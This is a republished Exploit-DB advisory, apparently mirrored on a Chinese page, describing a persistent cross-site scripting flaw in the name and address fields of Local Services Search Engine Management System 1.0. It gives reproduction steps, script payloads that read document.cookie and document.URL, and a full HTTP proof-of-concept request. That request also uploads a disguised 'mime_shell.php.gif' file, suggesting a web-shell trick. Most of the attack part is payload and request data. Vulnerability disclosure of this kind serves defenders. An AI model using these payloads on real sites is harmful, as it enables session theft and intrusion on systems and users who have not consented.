Local Services Search Engine Management System (LSSMES) 1.0 – ‘name’ Persistent Cross-Site Scripting (XSS)

  • 作者: Tushar Vaidya
    日期: 2021-03-03
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/49609/
  • # Exploit Title: Local Services Search Engine Management System (LSSMES) 1.0 - 'name' Persistent Cross-Site Scripting (XSS)
    # Date: 2021-03-03
    # Exploit Author: Tushar Vaidya
    # Vendor Homepage: https://phpgurukul.com/local-services-search-engine-management-system-using-php-and-mysql/
    # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10867
    # Version: v1.0
    # Tested on: Ubuntu
    
    *Steps to Reproduce:*
    1) Login with Admin Credentials and click on the *Person List* button.
    2) Click on the *Add Person* button.
    3) Now add the 'Ba1man' in the input field of *Name* and 'Ba2man' in the input field of *Address *then intercept it with Burp Suite.
    4) Now add the following payload input field of *Name& Address*.
    
    Payload 1:ba1man"></td><script>alert(document.cookie)</script>
    Payload 2:ba2man"></td><script>alert(document.URL)</script>
    
    4) Click On Add
    5) Now go to http://localhost/LSSMES/lssems/view-category-detail.php?viewid=3
    6) XSS payload is triggered.
    7) Secondly, go to http://localhost/LSSMES/lssems/single-person-detail.php?viewid=25
    8) Again XSSpayload is triggered
    
    *Proof-of-concept:*
    1) Vulnerable Form Request:
    
    POST /LSSMES/lssems/admin/add-person.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:86.0) Gecko/20100101
    Firefox/86.0
    Accept:
    text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data;
    boundary=---------------------------366892106534365372313887502624
    Content-Length: 1110
    Origin: http:// localhost
    Connection: close
    Referer: http:// localhost /LSSMES/lssems/admin/add-person.php
    Cookie: PHPSESSID=rinoskt58u1hpa8s6i7di53rbc
    Upgrade-Insecure-Requests: 1
    -----------------------------366892106534365372313887502624
    Content-Disposition: form-data; name="category"
    3
    -----------------------------366892106534365372313887502624
    Content-Disposition: form-data; name="name"
    
    *ba1man"></td><script>alert(document.cookie)</script>*
    
    -----------------------------366892106534365372313887502624
    Content-Disposition: form-data; name="propic"; filename="mime_shell.php.gif"
    Content-Type: image/gif
    GIF8;
    -----------------------------366892106534365372313887502624
    Content-Disposition: form-data; name="mobilenumber"
    8524697125
    -----------------------------366892106534365372313887502624
    Content-Disposition: form-data; name="address"
    
    *ba1man"></td><script>alert(document.URL)</script>*
    
    -----------------------------366892106534365372313887502624
    Content-Disposition: form-data; name="city"
    
    -----------------------------366892106534365372313887502624
    Content-Disposition: form-data; name="submit"
    -----------------------------366892106534365372313887502624--
    
    
    2.1) Response:
    Go to http://localhost/LSSMES/lssems/view-category-detail.php?viewid=3
    Note: XSS from name parameter
    
    
    2.2) Response:
    Go to http://localhost/LSSMES/lssems/single-person-detail.php?viewid=25
    Note: XSS from address parameter